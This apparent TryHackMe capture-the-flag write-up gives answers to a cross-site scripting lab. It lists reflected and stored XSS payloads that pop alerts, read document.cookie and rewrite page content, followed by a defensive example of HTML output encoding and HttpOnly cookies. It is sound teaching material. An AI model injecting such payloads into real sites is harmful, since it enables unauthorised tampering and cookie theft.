TryHackMe: OWASP Top 10 || Severity 7 || Cross-Site Scripting

goay xuan hui
Apr 6, 2021

#1 Navigate to http://10.10.227.118/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.

<script>alert("Hello")</script>

#2 On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.

<script>alert(window.location.host)</script>

#3 Now navigate to http://10.10.227.118/ in your browser and click on the “Stored XSS” tab on the navbar; make an account. Then add a comment and see if you can insert some of your own HTML.

<a href="www.google.com"> Click on this link </a>

#4 On the same page, make an alert popup box appear on the page with your document cookies.

<script>alert(document.cookie)</script>

#5 Change “XSS Playground” to “I am a hacker” by adding a comment and using JavaScript.

<script>document.querySelector('#thm-title').textContent='I am a hacker'</script>
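
Why the stored comments in #3 to #5 run, and the fix on the server side, as an added example (not code from the TryHackMe room; the function names are hypothetical): the comment is written into the page as markup, and encoding it at output time turns it into plain text.

```javascript
// Added example: stored comments rendered as markup vs. HTML-encoded at output.
// renderCommentVulnerable / renderCommentSafe are hypothetical names, not the lab's code.

// Comments taken from the answers to #3, #4 and #5 on this page.
const comments = [
  '<a href="www.google.com"> Click on this link </a>',
  '<script>alert(document.cookie)</script>',
  "<script>document.querySelector('#thm-title').textContent='I am a hacker'</script>",
];

// Vulnerable: the stored comment is concatenated into the page as markup,
// so the browser parses any tags it contains.
function renderCommentVulnerable(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Encode the five characters that let text break out of an HTML text or
// quoted-attribute context. '&' must be replaced first.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened: the comment is encoded when written out, so it displays as text.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// True if the rendered HTML contains any tag besides the wrapper div.
function containsInjectedTag(html) {
  const inner = html.replace(/^<div class="comment">/, '').replace(/<\/div>$/, '');
  return /<[a-zA-Z\/!]/.test(inner);
}

for (const c of comments) {
  console.log('vulnerable:', containsInjectedTag(renderCommentVulnerable(c)),
              'safe:', containsInjectedTag(renderCommentSafe(c)));
}
```

For #4 specifically, setting the HttpOnly flag on the session cookie also keeps it out of document.cookie.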
